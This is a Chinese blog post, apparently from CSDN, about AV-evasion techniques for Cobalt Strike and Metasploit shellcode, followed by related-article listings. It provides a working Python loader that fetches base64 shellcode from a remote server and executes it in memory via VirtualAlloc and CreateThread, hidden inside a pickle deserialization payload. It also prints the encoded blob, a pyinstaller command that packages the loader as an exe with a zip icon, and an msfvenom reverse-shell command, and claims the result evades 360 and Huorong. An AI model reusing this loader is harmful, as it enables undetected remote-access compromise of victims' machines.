python3 cobalt strike msf shellcode反序列化bypass 360,火绒

最新推荐文章于 2024-04-15 10:53:19 发布
最新推荐文章于 2024-04-15 10:53:19 发布
阅读量893 收藏
点赞数
分类专栏: 免杀 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_sweelg/article/details/120156319
版权

本文仅以分离免杀为例,利用Python语言制作加载器对Cobaltstrike生成的Shellcode进行绕过杀软作为样例,举例说明通过加密Shellcode、分离免杀以及Python反序列化达到bypass的思路和方法。

原理:

我们原始的shellcode加载器是直接把shellcode放在里面进行运行,然而我们的分离免杀

整体流程是将我们的Shellcode与程序进行分离,而上传到目标的可执行程序仅作为一个类似于下载器的程序使用,例如我们可以搭建一个Http Server,之后构造我们的Shellcode页面,再由本地加载器访问页面地址,获取页面的Shellcode内容,之后加载并执行,流程类似于下图。

图片

首先是httpserver,我们这里采用简便的kali中用python开启web服务,具体方法见https://blog.csdn.net/X_sweelg/article/details/117915045

首先我们使用cs生成python的payload

 然后把这些payload进行base64编码后放到服务器上面

 如果能访问到如下界面即可

 然后把地址进行序列化,把ip改为自己服务器shellcode地址

import pickle
import base64

shellcode = """
import ctypes,urllib.request,codecs,base64

shellcode = urllib.request.urlopen('http://192.168.1.162/bypass.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))

# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr), 
    buf, 
    ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.c_uint64(ptr), 
    ctypes.c_int(0), 
    ctypes.c_int(0), 
    ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
"""


class A(object):
    def __reduce__(self):
        return (exec, (shellcode,))


ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
ret_decode = base64.b64decode(ret_base64)

 最后就可以进行解码和反序列化

从代码层面来讲,杀软视角的代码仅能看到是一段正常的Base64解码以及反序列化的脚本文件,也就达到了我们Bypass的目的,运行脚本我们可正常上线以及执行命令。

import base64,pickle
shellcode = b'gANjYnVpbHRpbnMKZXhlYwpxAFg1BAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NAoKc2hlbGxjb2RlID0gdXJsbGliLnJlcXVlc3QudXJsb3BlbignaHR0cDovLzE5Mi4xNjguMS4xNjIvYnlwYXNzLnR4dCcpLnJlYWQoKQpzaGVsbGNvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKHNoZWxsY29kZSkKc2hlbGxjb2RlID1jb2RlY3MuZXNjYXBlX2RlY29kZShzaGVsbGNvZGUpWzBdCnNoZWxsY29kZSA9IGJ5dGVhcnJheShzaGVsbGNvZGUpCiMg6K6+572uVmlydHVhbEFsbG9j6L+U5Zue57G75Z6L5Li6Y3R5cGVzLmNfdWludDY0CmN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jLnJlc3R5cGUgPSBjdHlwZXMuY191aW50NjQKIyDnlLPor7flhoXlrZgKcHRyID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpLCBjdHlwZXMuY19pbnQoMHgzMDAwKSwgY3R5cGVzLmNfaW50KDB4NDApKQoKIyDmlL7lhaVzaGVsbGNvZGUKYnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oc2hlbGxjb2RlKSkuZnJvbV9idWZmZXIoc2hlbGxjb2RlKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoCiAgICBjdHlwZXMuY191aW50NjQocHRyKSwgCiAgICBidWYsIAogICAgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKQopCiMg5Yib5bu65LiA5Liq57q/56iL5LuOc2hlbGxjb2Rl6Ziy5q2i5L2N572u6aaW5Zyw5Z2A5byA5aeL5omn6KGMCmhhbmRsZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuQ3JlYXRlVGhyZWFkKAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMuY191aW50NjQocHRyKSwgCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkKKQojIOetieW+heS4iumdouWIm+W7uueahOe6v+eoi+i/kOihjOWujApjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoY3R5cGVzLmNfaW50KGhhbmRsZSksY3R5cGVzLmNfaW50KC0xKSkKcQGFcQJScQMu'
pickle.loads(base64.b64decode(shellcode))

 最后可以用pyinstaller进行打包成exe文件,pyinstaller安装方法自行百度

pyinstaller -F shellcode.py --noconsole -i zip.ico -n base.exe

 

最后在dist文件夹中找到base3.exe,火绒和360都能过,vt免杀率也挺高的

 国内的基本都能过,国外的一些过不了

msf的python免杀也是同理,只是把shellcode的格式需要修改一下,如果后面记得的话就再加上吧

msf生成python的payload命令

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP地址 lport=端口 -f python

参考文章:https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ

Sweelg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CobaltStrikeDetected:40行代码检测到大部分CobaltStrikeshellcode
08-04
由于cobaltstrike等无文件木马区段所在的是private内存,所以在执行loadimage回调的时候可以通过堆栈回溯快速确认是否是无文件木马 检测只需要40行代码: 在loadimagecallback上做堆栈回溯 发现是private区域的内存...
CobaltStrike基础使用详解
weixin_53747497的博客
04-17 3565
Cobalt Strike(简称为CS)是一款团队作战渗透测试神器,是一种可以用来进行横 向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可 以连接多个服务端,一个服务端也可以对应多个客户端连接。Connect to team server:连接服务端Disonnect from team server:断开当前服务端连接Configure Listeners:配置监听器Show sessions in graph view:展示会话列表。
CobaltStrike木马免杀代码篇之python反序列化分离免杀(一)
xf555er的博客
11-21 1836
本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离免杀处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化免杀所需用到的相关函数和库
Cobaltstrike学习(一)生成Listner和Payload
kang_12358的博客
07-10 2307
一、Listner(监听器) Listner(监听器):用于监控其他对象身上发生改变的事件和状态来进行响应的处理的设置,可以理解为:用来监控接受目标主机权限的一个设置。现在很多工具都有Listner的设置,例:msf、empire等。 1、创建Listner: Cobalt strike ==>Listner 我用的是3.14版本,里面内置了9个监听器。 beacon是cs内置的监听器,当我们在目标机器上成功执行Payload后,会...
CS结合python3混淆shellcode制作免杀脚本
m0_48108919的博客
03-19 7433
文章参考自:Cobalt Strike免杀操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
CobaltStrike4.4.zip
09-15
Cobalt Strike是一款备受瞩目的渗透测试工具,主要用于模拟高级威胁行为,帮助网络安全专业人士进行红队操作和评估网络防御的有效性。在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关...
cobaltstrike中文版.zip
05-17
3. **Aggressor**:是Cobalt Strike的图形用户界面,通过它,用户可以管理Beacon会话,执行命令,监视网络流量,以及进行其他高级操作。 4. **Payloads and Stagers**:Cobalt Strike支持多种载体和阶段器,这些是...
Keynote - Cobalt Strike Threat Hunting, Chad Tilbury.pdf
12-07
3. 横向移动: Cobalt Strike 支持横向移动,允许攻击者在目标网络中移动和控制其他系统。 4. 高度可定制: Cobalt Strike 的配置文件高度可定制,允许攻击者根据需要配置工具的行为和功能。 Cobalt Strike 在入侵...
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
360免杀提权工具,过市面常见杀软!
04-09
360免杀提权工具,过市面常见杀软!360免杀提权工具,过市面常见杀软!360免杀提权工具,过市面常见杀软!
python 执行shellcode_各种语言实现Shellcode加载(暂时两种)
weixin_39612817的博客
01-28 691
原理:使用Shellcode加载器分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合加密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态免杀是过不了的参考资料C/C++语言实现Shellcode加载Shellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
木马免杀代码之python反序列化分离免杀
最新发布
04-15 1065
Cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,同时还保留了各种不同算法的低级别接口,保留灵活性我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。各自对应多种不同的算法,每种算法又有不同的密钥位长要求,另外还涉及到不同的分组加密模式,以及末尾补齐方式。
Python远程加载分离、反序列化免杀
qq_43606723的博客
08-15 1761
shellcode.py远程加载反序列化免杀手法
Cobal Strike免杀过360
qq_44905657的博客
12-27 3287
Cobal Strike生成shellcode免杀
python安装方法_Python安装教程和使用技巧
weixin_39723678的博客
11-17 231
下面链接是Python各版本的安装包,需要哪个版本下载哪个版本,压缩包里边有word版本的安装教程,请一起下载! 链接:https://pan.baidu.com/s/1M4TDWLJdU25hB7JXDSvssw 提取码:r4lo Python是跨平台性的,几乎所有的Python程序可以不加修改的运行在不同操作平台上,并能得到同样的结果。Python语言是一种典型的脚本语言,简洁,语...
[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)
weixin_30432179的博客
07-21 4992
0x001 原理 采用分离法,即将ShellCode加载器分离。方法较LOW但免杀。 本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。 PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。 如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。 再详细点,打个比方,你只会炒一个菜,你敢说你是厨师吗? 0x002 ShellCo...
python序列化和反序列化_python反序列化免杀
weixin_39789042的博客
01-31 663
在日常的渗透行动当中,当我们对目标进行内网横向渗透时很不幸的是内网一般往往都会部署防火墙、流量监控等设备,杀软更是成为了服务器的标配,所以如何进行免杀绕过杀毒软件的限制让主机上线成了我们首要解决的问题之一下面使用python反序列化进行免杀这是python原始shellcode加载方式importctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8....
cobaltstrike4.3插件——BypassAV免杀使用
wdsj_xh的博客
05-12 5886
0x01* 环境介绍 本次免杀所使用的是shellcode分离免杀技术 cobaltstrike4.3客户端:Windows10 专业版 cobaltstrike4.3客户端:自己VPS CS版本:4.3 语言环境:Golang,插件需要本地安装Golang环境,生成木马时会调用编译 cobaltstrike4.3下载和使用见前面文章,CSDN应该发不了破解类东西啦,贴下自己网站链接 http://www.digter8.com/391.html CS 4.3下载 http://www.digter8.co
内网渗透神器CobaltStrike之重定向服务配置(二)
xf555er的博客
11-18 826
"重定向"是一个在CS服务器与目标主机进行网络传输之间的服务器, 不仅能保护CS服务器, 还能增强与目标网络传输的稳定性, 例如某一台重定向服务器倒塌了, 但是CS服务器还是能通过其他重定向服务器与目标网络进行信息传输。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值